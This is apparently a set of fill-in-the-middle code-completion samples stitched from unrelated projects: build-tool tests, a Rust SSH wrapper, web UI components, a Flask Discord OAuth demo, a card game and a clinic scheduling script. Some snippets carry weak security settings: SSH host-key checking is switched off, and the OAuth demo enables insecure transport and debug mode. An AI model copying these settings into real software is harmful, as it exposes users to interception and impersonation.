Address) -> str: return ( f"Conditionally succeeds test runner: Passed for {address}!" if address.target_name != "bad" else "" ) @staticmethod def stderr(address: Address) -> str: return ( f"Conditionally succeeds test runner: Had an issue for {address}! Oh no!" 
if address.target_name == "bad" else "" ) class InvalidTargetTestRunner(MockTestRunner): @staticmethod def is_valid_target(_: TargetAdaptorWithOrigin) -> bool: return False @staticmethod def status(_: Address) -> Status: return Status.FAILURE class TestTest(TestBase): def make_ipr(self) -> InteractiveProcessRequest: input_files_content = InputFilesContent( (FileContent(path="program.py", content=b"def test(): pass"),) ) digest = self.request_single_product(Digest, input_files_content) return InteractiveProcessRequest( argv=("/usr/bin/python", "program.py",), run_in_workspace=False, input_files=digest, ) def run_test_rule( self, *, test_runner: Type[TestRunner], targets: List[HydratedTargetWithOrigin], debug: bool = False, ) -> Tuple[int, str]: console = MockConsole(use_colors=False) options = MockOptions(debug=debug, run_coverage=False) interactive_runner = InteractiveRunner(self.scheduler) workspace = Workspace(self.scheduler) union_membership = UnionMembership({TestRunner: OrderedSet([test_runner])}) def mock_coordinator_of_tests( wrapped_test_runner: WrappedTestRunner, ) -> AddressAndTestResult: runner = wrapped_test_runner.runner return AddressAndTestResult( address=runner.adaptor_with_origin.adaptor.address, test_result=runner.test_result, # type: ignore[attr-defined] ) result: Test = run_rule( run_tests, rule_args=[ console, options, interactive_runner, HydratedTargetsWithOrigins(targets), workspace, union_membership, ], mock_gets=[ MockGet( product_type=AddressAndTestResult, subject_type=WrappedTestRunner, mock=lambda wrapped_test_runner: mock_coordinator_of_tests(wrapped_test_runner), ), MockGet( product_type=TestDebugRequest, subject_type=TestRunner, mock=lambda _: TestDebugRequest(self.make_ipr()), ), MockGet( product_type=CoverageReport, subject_type=CoverageDataBatch, mock=lambda _: FilesystemCoverageReport( result_digest=EMPTY_DIRECTORY_DIGEST, directory_to_materialize_to=PurePath("mockety/mock"), ), ), ], union_membership=union_membership, ) return result.exit_code, console.stdout.getvalue() def test_empty_target_noops(self) -> None: exit_code, stdout = self.run_test_rule( test_runner=SuccessfulTestRunner, targets=[FmtTest.make_hydrated_target_with_origin(include_sources=False)], ) assert exit_code == 0 assert stdout.strip() == "" def test_invalid_target_noops(self) -> None: exit_code, stdout = self.run_test_rule( test_runner=InvalidTargetTestRunner, targets=[FmtTest.make_hydrated_target_with_origin()], ) assert exit_code == 0 assert stdout.strip() == "" def test_single_target(self) -> None: target_with_origin = FmtTest.make_hydrated_target_with_origin() address = target_with_origin.target.adaptor.address exit_code, stdout = self.run_test_rule( test_runner=SuccessfulTestRunner, targets=[target_with_origin], ) assert exit_code == 0 assert stdout == dedent( f"""\ {address} stdout: {SuccessfulTestRunner.stdout(address)} {address} ..... SUCCESS """ ) def test_multiple_targets(self) -> None: good_target = FmtTest.make_hydrated_target_with_origin(name="good") good_address = good_target.target.adaptor.address bad_target = FmtTest.make_hydrated_target_with_origin(name="bad") bad_address = bad_target.target.adaptor.address exit_code, stdout = self.run_test_rule( test_runner=ConditionallySucceedsTestRunner, targets=[good_target, bad_target], ) assert exit_code == 1 assert stdout == dedent( f"""\ {good_address} stdout: {ConditionallySucceedsTestRunner.stdout(good_address)} {bad_address} stderr: {ConditionallySucceedsTestRunner.stderr(bad_address)} {good_address} ..... 
SUCCESS {bad_address} ..... FAILURE """ ) def test_single_debug_target(self) -> None: exit_code, stdout = self.run_test_rule( test_runner=SuccessfulTestRunner, targets=[FmtTest.make_hydrated_target_with_origin()], debug=True, ) assert exit_code == 0 def test_multiple_debug_targets_fail(self) -> None: with pytest.raises(ResolveError): self.run_test_rule( test_runner=SuccessfulTestRunner, targets=[ FmtTest.make_hydrated_target_with_origin(name="t1"), FmtTest.make_hydrated_target_with_origin(name="t2"), ], debug=True, )<|fim▁end|>
# TODO(#9141): replace this with a proper util to create `GoalSubsystem`s class MockOptions: def __init__(self, **values):
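The completion above defines MockOptions, which wraps its keyword arguments in a unittest.mock.Mock so that attribute access behaves like a real options object. A minimal, self-contained sketch of that behavior outside the Pants test harness:

from unittest.mock import Mock

class MockOptions:
    def __init__(self, **values):
        self.values = Mock(**values)

# Keyword arguments to Mock become plain attributes on the mock.
opts = MockOptions(debug=True, run_coverage=False)
assert opts.values.debug is True
assert opts.values.run_coverage is False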
<|file_name|>ssh.rs<|end_file_name|><|fim▁begin|>use libc::{c_char, execvp}; use std::io::prelude::*; use std::ffi::CString; use std::ptr; macro_rules! c_ptr { ($x:expr) => {{ /* into_raw() deliberately leaks the CString so the pointer stays valid until execvp replaces the process; as_ptr() on the temporary would leave argv dangling */ CString::new($x).unwrap().into_raw() as *const c_char }}; } fn exec_ssh(ip: &str, command: &str, verbose: bool) { let user_host: &str = &format!("rightscale@{}", ip); let ssh_command = format!("ssh -t -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null {} \"{}\"", user_host, command); if verbose { println!("Running {}", ssh_command) } let argv: &[*const c_char] = &[c_ptr!("ssh"), c_ptr!("-t"), c_ptr!("-o"), c_ptr!("StrictHostKeyChecking=no"), c_ptr!("-o"), c_ptr!("UserKnownHostsFile=/dev/null"), c_ptr!(user_host), c_ptr!(command), ptr::null()]; unsafe { execvp(argv[0], &argv[0]); } die!("ssh command failed: {}", ssh_command); } fn ssh_command_arg(user: Option<String>, command: Option<String>) -> String { let user_prefix = user.and_then(|u| Some(format!("sudo -u \"{}\"", u))); let escaped_command = command.and_then(|c| Some(c.replace("\"", "\\\""))); match user_prefix { Some(u) => match escaped_command { Some(c) => format!("{} -- sh -cl \"{}\"", u, c), None => format!("{} -s", u) }, None => escaped_command.unwrap_or("".to_string()) } } pub fn ssh_connect(ip: String, user: Option<String>, command: Option<String>, verbose: bool) { exec_ssh(&ip, &ssh_command_arg(user, command), verbose); } #[cfg(test)] mod tests { mod ssh_command_arg { use super::super::ssh_command_arg; #[test] fn no_user() { assert_eq!("pwd".to_string(), ssh_command_arg(None, Some("pwd".to_string()))); } #[test] fn no_command() { assert_eq!("sudo -u \"sean\" -s".to_string(), ssh_command_arg(Some("sean".to_string()), None)); } #[test]<|fim▁hole|> } }<|fim▁end|>
fn user_and_command() { assert_eq!("sudo -u \"sean\" -- sh -cl \"cd / && /bin/bash\"".to_string(), ssh_command_arg(Some("sean".to_string()), Some("cd / && /bin/bash".to_string()))); }
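The subtle part of the ssh.rs example is the quoting in ssh_command_arg: double quotes inside the command are backslash-escaped before the whole command is wrapped in sh -cl "...". The same rules restated as a small Python mirror (a hypothetical helper written only to make the three Rust tests above easier to follow):

def ssh_command_arg(user=None, command=None):
    escaped = command.replace('"', '\\"') if command is not None else None
    if user is not None:
        if escaped is not None:
            return f'sudo -u "{user}" -- sh -cl "{escaped}"'
        return f'sudo -u "{user}" -s'  # no command: open a shell as that user
    return escaped if escaped is not None else ""

assert ssh_command_arg(command="pwd") == "pwd"
assert ssh_command_arg(user="sean") == 'sudo -u "sean" -s'
assert ssh_command_arg(user="sean", command="cd / && /bin/bash") == 'sudo -u "sean" -- sh -cl "cd / && /bin/bash"'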
<|file_name|>scholarship.js<|end_file_name|><|fim▁begin|>var View = require('ampersand-view'); var templates = require('../templates'); module.exports = View.extend({ template: templates.includes.scholarship, bindings: { 'model.field': '[role=field]', 'model.slots': '[role=slots]', 'model.holder': '[role=holder]', 'model.type': '[role=type]', 'model.link': { type: 'attribute', role: 'link', name: 'href' },<|fim▁hole|> } });<|fim▁end|>
'model.scholarshipIdUpperCase': '[role=link]', 'model.releaseDateFormated': '[role=release-date]', 'model.closeDateFormated': '[role=close-date]'
<|file_name|>radio-button.js<|end_file_name|><|fim▁begin|>HB.RadioButtonComponent = Ember.Component.extend({ tagName: 'input', type: 'radio', attributeBindings: ['type', 'htmlChecked:checked', 'value', 'name'], htmlChecked: function(){ return this.get('value') === this.get('checked'); }.property('value', 'checked'),<|fim▁hole|>});<|fim▁end|>
change: function(){ this.set('checked', this.get('value')); }
<|file_name|>wsgi.py<|end_file_name|><|fim▁begin|>""" WSGI config for goska project.<|fim▁hole|>https://docs.djangoproject.com/en/1.6/howto/deployment/wsgi/ """ import os os.environ.setdefault("DJANGO_SETTINGS_MODULE", "goska.settings") from django.core.wsgi import get_wsgi_application application = get_wsgi_application()<|fim▁end|>
It exposes the WSGI callable as a module-level variable named ``application``. For more information on this file, see
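The application object built in the wsgi.py example is a standard WSGI entry point, so any WSGI server can import and serve it. A minimal sketch using the standard library's reference server, assuming the goska package is importable (a production deployment would use a real server instead, e.g. gunicorn goska.wsgi:application):

from wsgiref.simple_server import make_server
from goska.wsgi import application  # assumes goska is on the import path

# Serve the Django app on localhost:8000 with the stdlib reference server.
with make_server("", 8000, application) as httpd:
    httpd.serve_forever()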
<|file_name|>LoginPresenter.java<|end_file_name|><|fim▁begin|>package com.riteshakya.subs.views.screens.login; <|fim▁hole|>import com.google.android.gms.common.api.GoogleApiClient; import com.riteshakya.subs.mvp.FlowListener; import com.riteshakya.subs.mvp.IPresenter; import com.riteshakya.subs.mvp.IView; /** * @author Ritesh Shakya */ public interface LoginPresenter extends IPresenter { void setView(LoginView loginView); void initialize(); void validateResult(Intent data); GoogleApiClient getGoogleApiClient(); interface LoginFlowListener extends FlowListener { void openMainActivity(); } interface LoginView extends IView { FragmentActivity getActivity(); } }<|fim▁end|>
import android.content.Intent; import android.support.v4.app.FragmentActivity;
<|file_name|>app.py<|end_file_name|><|fim▁begin|>import os from flask import Flask, g, session, redirect, request, url_for, jsonify from requests_oauthlib import OAuth2Session OAUTH2_CLIENT_ID = os.environ['OAUTH2_CLIENT_ID'] OAUTH2_CLIENT_SECRET = os.environ['OAUTH2_CLIENT_SECRET']<|fim▁hole|> API_BASE_URL = os.environ.get('API_BASE_URL', 'https://discordapp.com/api') AUTHORIZATION_BASE_URL = API_BASE_URL + '/oauth2/authorize' TOKEN_URL = API_BASE_URL + '/oauth2/token' app = Flask(__name__) app.debug = True app.config['SECRET_KEY'] = OAUTH2_CLIENT_SECRET if 'http://' in OAUTH2_REDIRECT_URI: os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = 'true' def token_updater(token): session['oauth2_token'] = token def make_session(token=None, state=None, scope=None): return OAuth2Session( client_id=OAUTH2_CLIENT_ID, token=token, state=state, scope=scope, redirect_uri=OAUTH2_REDIRECT_URI, auto_refresh_kwargs={ 'client_id': OAUTH2_CLIENT_ID, 'client_secret': OAUTH2_CLIENT_SECRET, }, auto_refresh_url=TOKEN_URL, token_updater=token_updater) @app.route('/') def index(): scope = request.args.get( 'scope', 'identify email connections guilds guilds.join') discord = make_session(scope=scope.split(' ')) authorization_url, state = discord.authorization_url(AUTHORIZATION_BASE_URL) session['oauth2_state'] = state return redirect(authorization_url) @app.route('/callback') def callback(): if request.values.get('error'): return request.values['error'] discord = make_session(state=session.get('oauth2_state')) token = discord.fetch_token( TOKEN_URL, client_secret=OAUTH2_CLIENT_SECRET, authorization_response=request.url) session['oauth2_token'] = token return redirect(url_for('.me')) @app.route('/me') def me(): discord = make_session(token=session.get('oauth2_token')) user = discord.get(API_BASE_URL + '/users/@me').json() guilds = discord.get(API_BASE_URL + '/users/@me/guilds').json() connections = discord.get(API_BASE_URL + '/users/@me/connections').json() return jsonify(user=user, guilds=guilds, connections=connections) if __name__ == '__main__': app.run()<|fim▁end|>
OAUTH2_REDIRECT_URI = 'http://localhost:5000/callback'
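The completion above supplies the redirect URI, which must match both the /callback route in app.py and the redirect registered with Discord. A minimal sketch of the first leg of the flow with requests_oauthlib, using a placeholder client id (the app reads it from OAUTH2_CLIENT_ID instead):

from requests_oauthlib import OAuth2Session

oauth = OAuth2Session(
    client_id="<your-client-id>",  # placeholder; not a real credential
    redirect_uri="http://localhost:5000/callback",
    scope=["identify", "guilds"],
)
authorization_url, state = oauth.authorization_url(
    "https://discordapp.com/api/oauth2/authorize"
)
# Send the user to authorization_url; Discord redirects back to /callback
# with ?code=...&state=..., which fetch_token() exchanges for a token.
print(authorization_url)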
<|file_name|>main.cpp<|end_file_name|><|fim▁begin|>#include "Card.h" #include "Game.h" #include <iostream> #include <array> #include <string> #include <vector> #include <algorithm> #include <random> #include <cstdlib> #include <ctime> using namespace std; using namespace zks::game::card; int test_deck() { CardDeck deck(1); CardDeck d1, d2; deck.shuffle(); cout << "deck: " << deck.str() << endl; cout << "d1: " << d1.str() << endl; cout << "d2: " << d2.str() << endl; cout << "\nget from back:\n"; for (auto i = 0; i<10; ++i) { d1.put_card(deck.get_card()); cout << d1.str() << endl; } cout << "\nget from front:\n"; for (auto i = 0; i<10; ++i) { d2.put_card(deck.get_card(false)); cout << d2.str() << endl; } cout << "\n"; cout << "deck: " << deck.str() << endl; return 0; } int main() { Game g; cout << "game: \n" << g.str() << endl; <|fim▁hole|> g.prepare(); cout << "game: \n" << g.str() << endl; g.play(); cout << "game: \n" << g.str() << endl; g.post(); cout << "game: \n" << g.str() << endl; return 0; } int test_suite() { for (const auto& s : Suite()) { cout << to_string(s) << ", "; } cout << endl; return 0; } int test_number() { for (const auto& n : Number()) { cout << to_string(n) << ", "; } cout << endl; return 0; } int test_card() { vector<Card> deck; for (auto s = begin(Suite()); s<Suite::JOKER; ++s) { for (const auto& n : Number()) { deck.emplace_back(s, n); } } cout << "\n"; for (auto const& c : deck) { cout << to_string(c) << ", "; } cout << "\n"; std::srand(std::time(0)); std::array<int, std::mt19937::state_size> seed_data; std::generate(seed_data.begin(), seed_data.end(), std::rand); std::seed_seq seq(seed_data.begin(), seed_data.end()); std::mt19937 g(seq); std::shuffle(deck.begin(), deck.end(), g); cout << "\n"; for (auto const& c : deck) { cout << to_string(c) << ", "; } cout << "\n"; return 0; }<|fim▁end|>
<|file_name|>buttons-input.rs<|end_file_name|><|fim▁begin|>/* * Copyright (c) 2018 Boucher, Antoni <[email protected]> * * Permission is hereby granted, free of charge, to any person obtaining a copy of * this software and associated documentation files (the "Software"), to deal in * the Software without restriction, including without limitation the rights to * use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of * the Software, and to permit persons to whom the Software is furnished to do so, * subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR<|fim▁hole|> * FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR * COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER * IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ use gtk::{ EditableSignals, Inhibit, prelude::ButtonExt, prelude::EntryExt, prelude::LabelExt, prelude::OrientableExt, prelude::WidgetExt, }; use gtk::Orientation::{Horizontal, Vertical}; use relm::{Relm, Widget}; use relm_derive::{Msg, widget}; use self::Msg::*; pub struct Model { left_text: String, relm: Relm<Win>, right_text: String, text: String, } #[derive(Clone, Msg)] pub enum Msg { Cancel, Concat, DataAvailable(String), DataCleared, LeftChanged(String), RightChanged(String), Quit, } #[widget] impl Widget for Win { fn model(relm: &Relm<Self>, (): ()) -> Model { Model { left_text: String::new(), right_text: String::new(), relm: relm.clone(), text: String::new(), } } fn update(&mut self, event: Msg) { match event { Cancel => { self.model.left_text = String::new(); self.model.right_text = String::new(); self.model.text = String::new(); self.model.relm.stream().emit(DataCleared); }, Concat => { self.model.text = format!("{}{}", self.model.left_text, self.model.right_text); self.model.relm.stream().emit(DataAvailable(self.model.text.clone())); }, // To be listened to by the user. DataAvailable(_) | DataCleared => (), LeftChanged(text) => self.model.left_text = text, RightChanged(text) => self.model.right_text = text, Quit => gtk::main_quit(), } } view! 
{ #[name="window"] gtk::Window { gtk::Box { gtk::Box { #[name="left_entry"] gtk::Entry { text: &self.model.left_text, changed(entry) => LeftChanged(entry.text().to_string()), }, #[name="right_entry"] gtk::Entry { text: &self.model.right_text, changed(entry) => RightChanged(entry.text().to_string()), }, orientation: Horizontal, }, gtk::ButtonBox { #[name="concat_button"] gtk::Button { clicked => Concat, label: "Concat", }, #[name="cancel_button"] gtk::Button { clicked => Cancel, label: "Cancel", }, orientation: Horizontal, }, orientation: Vertical, #[name="label"] gtk::Label { label: &self.model.text, }, }, delete_event(_, _) => (Quit, Inhibit(false)), } } } #[cfg(test)] mod tests { use gdk::keys::constants as key; use gtk::prelude::{ EntryExt, GtkWindowExt, LabelExt, WidgetExt, }; use gtk_test::{ assert_text, focus, }; use relm_test::{ enter_key, enter_keys, relm_observer_new, relm_observer_wait, }; use crate::Msg::{DataAvailable, DataCleared}; use crate::Win; #[test] fn label_change() { let (component, _, widgets) = relm::init_test::<Win>(()).expect("init_test failed"); let cancel_button = &widgets.cancel_button; let concat_button = &widgets.concat_button; let label = &widgets.label; let left_entry = &widgets.left_entry; let right_entry = &widgets.right_entry; let window = &widgets.window; let available_observer = relm_observer_new!(component, DataAvailable(_)); let cleared_observer = relm_observer_new!(component, DataCleared); assert_text!(label, ""); enter_keys(&window.focused_widget().expect("focused widget"), "left"); enter_key(window, key::Tab); assert!(right_entry.has_focus()); enter_keys(&window.focused_widget().expect("focused widget"), "right"); enter_key(window, key::Tab); assert!(concat_button.has_focus()); enter_key( &window.focused_widget().expect("focused widget"), key::space, ); assert_text!(label, "leftright"); enter_key(window, key::Tab); assert!(cancel_button.has_focus()); enter_key( &window.focused_widget().expect("focused widget"), key::space, ); assert_text!(label, ""); assert_text!(left_entry, ""); assert_text!(right_entry, ""); focus(left_entry); assert!(left_entry.has_focus()); focus(right_entry); assert!(right_entry.has_focus()); relm_observer_wait!(let DataAvailable(text) = available_observer); assert_eq!(text, "leftright"); relm_observer_wait!(let DataCleared = cleared_observer); } }<|fim▁end|>
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
<|file_name|>ControllerType.java<|end_file_name|><|fim▁begin|>package com.raoulvdberge.refinedstorage.block.enums; import net.minecraft.util.IStringSerializable; public enum ControllerType implements IStringSerializable { NORMAL(0, "normal"), CREATIVE(1, "creative"); private int id; private String name; ControllerType(int id, String name) { this.id = id; this.name = name; }<|fim▁hole|> } public int getId() { return id; } @Override public String toString() { return name; } }<|fim▁end|>
@Override public String getName() { return name;
<|file_name|>mobile.js<|end_file_name|><|fim▁begin|>toastr.options = { "closeButton": true, "debug": false, "newestOnTop": true, "progressBar": true, "positionClass": "toast-bottom-full-width", "preventDuplicates": false, "showDuration": "300", "hideDuration": "1000", "timeOut": "5000", "extendedTimeOut": "1000", "showEasing": "swing", "hideEasing": "linear", "showMethod": "fadeIn", "hideMethod": "fadeOut" }; function checkEmpty(o,n) { if (o.val() === '' || o.val() === null) { var text = n.replace(":",""); toastr.error(text + " Required"); o.addClass("ui-state-error"); return false; } else { o.removeClass("ui-state-error"); return true; } } function checkNumeric(o,n) { if (! $.isNumeric(o.val())) { var text = n.replace(":",""); toastr.error(text + " is not a number!"); o.addClass("ui-state-error"); return false; } else { o.removeClass("ui-state-error"); return true; } } function checkRegexp( o, regexp, n ) { if ( !( regexp.test( o.val() ) ) ) { var text = n.replace(":",""); toastr.error("Incorrect format: " + text); o.addClass("ui-state-error"); return false; } else { o.removeClass("ui-state-error"); return true; } } function split( val ) { return val.split( /\n\s*/ ); } function extractLast( term ) { return split( term ).pop(); } function search_array(a, query_value){ var query_value1 = query_value.replace('?','\\?'); var query_value2 = query_value1.replace('(','\\('); var query_value3 = query_value2.replace(')','\\)'); var query_value4 = query_value3.replace('+','\\+'); var query_value5 = query_value4.replace('/','\\/'); var found = $.map(a, function (value) { var re = RegExp(query_value5, "g"); if(value.match(re)) { return value; } else { return null; } }); return found; } function progressbartrack() { if (parseInt(noshdata.progress) < 100) { if (noshdata.progress === 0) { $("#dialog_progressbar").progressbar({value:0}); } $.ajax({ type: "POST", url: "ajaxdashboard/progressbar-track", success: function(data){ $("#dialog_progressbar").progressbar("value", parseInt(data)); if (parseInt(data) < 100) { setTimeout(progressbartrack(),1000); noshdata.progress = data; } else { $.ajax({ type: "POST", url: "ajaxdashboard/delete-progress", success: function(data){ $("#dialog_progressbar").progressbar('destroy'); $("#dialog_load").dialog('close'); noshdata.progress = 0; } }); } } }); } } function reload_grid(id) { if ($("#"+id)[0].grid) { jQuery("#"+id).trigger("reloadGrid"); } } function open_demographics() { $.ajax({ type: "POST", url: "ajaxdashboard/demographics", dataType: "json", success: function(data){ $.each(data, function(key, value){ if (key == 'DOB') { value = editDate1(data.DOB); } $("#edit_demographics_form :input[name='" + key + "']").val(value); }); if (noshdata.group_id != '100') { $.ajax({ type: "POST", url: "ajaxdashboard/check-registration-code", success: function(data){ if (data == 'n') { $("#register_menu_demographics").show(); } else { $("#register_menu_demographics").hide(); $("#menu_registration_code").html(data); } } }); } $("#menu_lastname").focus(); $("#demographics_list_dialog").dialog('open'); } }); } function schedule_autosave() { var d = $('#providers_calendar').fullCalendar('getDate'); var n = d.getFullYear(); n = n + "," + d.getMonth(); n = n + "," + d.getDate(); var view = $('#providers_calendar').fullCalendar('getView'); n = n + "," + view.name; $.cookie('nosh-schedule', n, { path: '/' }); } function addMinutes(date, minutes) { return new Date(date.getTime() + minutes*60000); } function isOverlapping(start){ var array = 
$('#providers_calendar').fullCalendar('clientEvents'); var end = addMinutes(start, 15); for(var i in array){ if(!(array[i].start >= end || array[i].end <= start)){ return true; } } return false; } function loadappt() { $("#patient_appt").show(); $("#start_form").show(); $("#reason_form").show(); $("#other_event").hide(); $("#event_choose").hide(); $("#patient_search").focus(); } function loadevent() { $("#patient_appt").hide(); $("#other_event").show(); $("#start_form").show(); $("#reason_form").show(); $("#event_choose").hide(); $("#reason").focus(); } function loadcalendar (y,m,d,view) { $('#providers_calendar').fullCalendar('destroy'); $('#providers_calendar').fullCalendar({ year: y, month: m, date: d, weekends: noshdata.weekends, minTime: noshdata.minTime, maxTime: noshdata.maxTime, theme: true, allDayDefault: false, slotMinutes: 15, defaultView: view, aspectRatio: 0.8, header: { left: 'prev,next today', center: 'title', right: 'agendaWeek,agendaDay' }, editable: true, events: function(start, end, callback) { var starttime = Math.round(start.getTime() / 1000); var endtime = Math.round(end.getTime() / 1000); $.ajax({ type: "POST", url: "ajaxschedule/provider-schedule", dataType: 'json', data: "start=" + starttime + "&end=" + endtime, success: function(events) { callback(events); } }); }, dayClick: function(date, allDay, jsEvent, view) { if (allDay) { $.jGrowl('Clicked on the entire day: ' + date); } else { if (noshdata.group_id == 'schedule') { if(confirm('You will need to login to schedule an appointment. Proceed?')){ window.location = noshdata.login_url; } } else { if (noshdata.group_id != '1') { if (noshdata.group_id != '100') { $("#event_dialog").dialog("option", "title", "Schedule an Appointment"); $("#event_dialog").dialog('open'); $("#title").focus(); $("#start_date").val($.fullCalendar.formatDate(date, 'MM/dd/yyyy')); $("#start_time").val($.fullCalendar.formatDate(date, 'hh:mmTT')); $("#end").val(''); $("#schedule_visit_type").val(''); $("#end_row").show(); $("#title").val(''); $("#reason").val(''); $("#until").val(''); $("#until_row").hide(); $('#repeat').val(''); $('#status').val(''); $("#delete_form").hide(); $(".nosh_schedule_exist_event").hide(); $("#patient_appt").hide(); $("#other_event").hide(); $("#until_row").hide(); $("#start_form").hide(); $("#reason_form").hide(); $("#event_choose").show(); } else { if (isOverlapping(date)) { $.jGrowl('You cannot schedule an appointment in this time slot!'); } else { $("#schedule_visit_type").focus(); $("#start").text($.fullCalendar.formatDate(date, 'dddd, MM/dd/yyyy, hh:mmTT')); $("#start_date").val($.fullCalendar.formatDate(date, 'MM/dd/yyyy')); $("#start_time").val($.fullCalendar.formatDate(date, 'hh:mmTT')); $("#end").val(''); $("#schedule_visit_type").val(''); $("#reason").val(''); $("#until").val(''); $("#until_row").hide(); $('#repeat').val(''); $("#delete_form").hide("fast"); $("#patient_appt").show(); $("#start_form").show(); $("#reason_form").show(); $("#other_event").hide(); $("#event_choose").hide(); $("#event_dialog").dialog("option", "title", "Schedule an Appointment"); $("#event_dialog").dialog('open'); } } } } } }, eventClick: function(calEvent, jsEvent, view) { if (noshdata.group_id != '1') { $("#event_id").val(calEvent.id); $("#event_id_span").text(calEvent.id); $("#schedule_pid").val(calEvent.pid); $("#pid_span").text(calEvent.pid); $("#timestamp_span").text(calEvent.timestamp); $("#start_date").val($.fullCalendar.formatDate(calEvent.start, 'MM/dd/yyyy')); 
$("#start_time").val($.fullCalendar.formatDate(calEvent.start, 'hh:mmTT')); $("#end").val($.fullCalendar.formatDate(calEvent.end, 'hh:mmTT')); $("#schedule_title").val(calEvent.title); $("#schedule_visit_type").val(calEvent.visit_type); if (calEvent.visit_type){ loadappt(); $("#patient_search").val(calEvent.title); $("#end").val(''); } else { loadevent(); } $("#reason").val(calEvent.reason); $("#repeat").val(calEvent.repeat); $("#until").val(calEvent.until); var repeat_select = $("#repeat").val(); if (repeat_select != ''){ $("#until_row").show(); } else { $("#until_row").hide(); $("#until").val(''); } $("#status").val(calEvent.status); $("#notes").val(calEvent.notes); $("#delete_form").show(); $(".nosh_schedule_exist_event").show(); $("#event_choose").hide(); if (calEvent.editable != false) { $("#event_dialog").dialog("option", "title", "Edit an Appointment"); $("#event_dialog").dialog('open'); $("#title").focus(); } } }, eventDrop: function(event,dayDelta,minuteDelta,allDay,revertFunc) { if (noshdata.group_id != '1') { var start = Math.round(event.start.getTime() / 1000); var end = Math.round(event.end.getTime() / 1000); if(start){ $.ajax({ type: "POST", url: "ajaxschedule/drag-event", data: "start=" + start + "&end=" + end + "&id=" + event.id, success: function(data){ $.jGrowl("Event updated!"); } }); } else { revertFunc(); } $('.fc-event').each(function(){ $(this).tooltip('disable'); }); } else { revertFunc(); $.jGrowl("You don't have permission to do this!"); } }, eventResize: function(event,dayDelta,minuteDelta,allDay,revertFunc) { if (noshdata.group_id != '1') { var start = Math.round(event.start.getTime() / 1000); var end = Math.round(event.end.getTime() / 1000); if(start){ $.ajax({ type: "POST", url: "ajaxschedule/drag-event", data: "start=" + start + "&end=" + end + "&id=" + event.id, success: function(data){ $.jGrowl("Event updated!"); } }); } else { revertFunc(); } $('.fc-event').each(function(){ $(this).tooltip('disable'); }); } else { revertFunc(); $.jGrowl("You don't have permission to do this!"); } }, eventRender: function(event, element) { var display = 'Reason: ' + event.reason + '<br>Status: ' + event.status + '<br>' + event.notes; element.tooltip({ items: element, hide: false, show: false, content: display }); element.tooltip('enable'); } }); $('#providers_datepicker').datepicker('destroy'); $('#providers_datepicker').datepicker({ inline: true, onSelect: function(dateText, inst) { var d = new Date(dateText); $('#providers_calendar').fullCalendar('gotoDate', d); var n = d.getFullYear(); n = n + "," + d.getMonth(); n = n + "," + d.getDate(); var view = $('#providers_calendar').fullCalendar('getView'); n = n + "," + view.name; $.cookie('nosh-schedule', n, { path: '/' }); } }); } function open_schedule_list(dateText, inst, load) { var starttime = Math.round(+new Date(dateText)/1000); var endtime = starttime+86400; var startday = moment(starttime*1000).format('YYYY-MM-DD'); var startday1 = 'Appointments for ' + moment(starttime*1000).format('MMMM Do YYYY') + ":"; $ul = $("#events"); $.mobile.loading("show"); $("#providers_date").html(startday1); var html = '<li><a href="#" id="patient_appt_button" class="nosh_schedule_event" data-nosh-start="' + startday + '">Add Appointment</a></li>'; html += '<li><a href="#" id="event_appt_button" class="nosh_schedule_event" data-nosh-start="' + startday + '">Add Event</a></li>'; $.ajax({ type: "POST", url: "ajaxschedule/provider-schedule", dataType: 'json', data: "start=" + starttime + "&end=" + endtime }) .then(function(response) { 
$.each(response, function ( i, val ) { var label = '<h3>' + val.title + '</h3>'; if (val.reason != val.title) { label += '<p>Reason: ' + val.reason + '</p>'; } if (val.visit_type != undefined) { label += '<p>Visit Type: ' + val.visit_type + '</p>'; } var date = $.datepicker.formatDate('M dd, yy, ', new Date(val.start)); var start_time = moment(new Date(val.start)).format('HH:mmA'); var end_time = moment(new Date(val.end)).format('HH:mmA'); var start_date = moment(new Date(val.start)).format('MM/DD/YYYY'); var color1 = 'clr-black'; if(val.className==" colorred"){ color1 = 'clr-red'; } if(val.className==" colororange"){ color1 = "clr-orange"; } if(val.className==" coloryellow"){ color1 = "clr-yellow"; } if(val.className==" colorgreen"){ color1 = "clr-green"; } if(val.className==" colorblue"){ color1 = "clr-blue"; } if(val.className==" colorpurple"){ color1 = "clr-purple"; } if(val.className==" colorbrown"){ color1 = "clr-brown" } label += '<span class="'+ color1 + '">' + date + start_time + '-' + end_time + '</span>'; html += '<li><a href="#" class="nosh_schedule_event" data-nosh-event-id="' + val.id + '" data-nosh-pid="' + val.pid + '" data-nosh-title="' + val.title + '" data-nosh-start-date="' + start_date + '" data-nosh-start-time="' + start_time + '" data-nosh-end-time="' + end_time + '" data-nosh-visit-type="' + val.visit_type + '" data-nosh-timestamp="' + val.timestamp + '" data-nosh-repeat="' + val.repeat + '" data-nosh-reason="' + val.reason + '" data-nosh-until="' + val.until + '" data-nosh-notes="' + val.notes + '" data-nosh-status="' + val.status + '" data-nosh-editable="' + val.editable + '">' + label + '</a></li>'; }); $ul.html(html); $ul.listview("refresh"); $ul.trigger("updatelayout"); $.mobile.loading("hide"); if (load !== undefined) { $('html, body').animate({ scrollTop: $("#patient_appt_button").offset().top }); } }); } function open_schedule(startdate) { $('#providers_datepicker').datepicker({ inline: true, onSelect: function (dateText, inst) { open_schedule_list(dateText, inst, true); } }); if (startdate == null) { $("#providers_datepicker").datepicker("setDate", new Date()); var date = moment().valueOf(); } else { var date = moment(startdate).valueOf(); $("#providers_datepicker").datepicker("setDate", new Date(date)); } open_schedule_list(date); $("#provider_list2").focus(); } function open_messaging(type) { $.mobile.loading("show"); $ul = $("#"+type); var command = type.replace('_', '-'); $.ajax({ type: "POST", url: "ajaxmessaging/" + command, data: 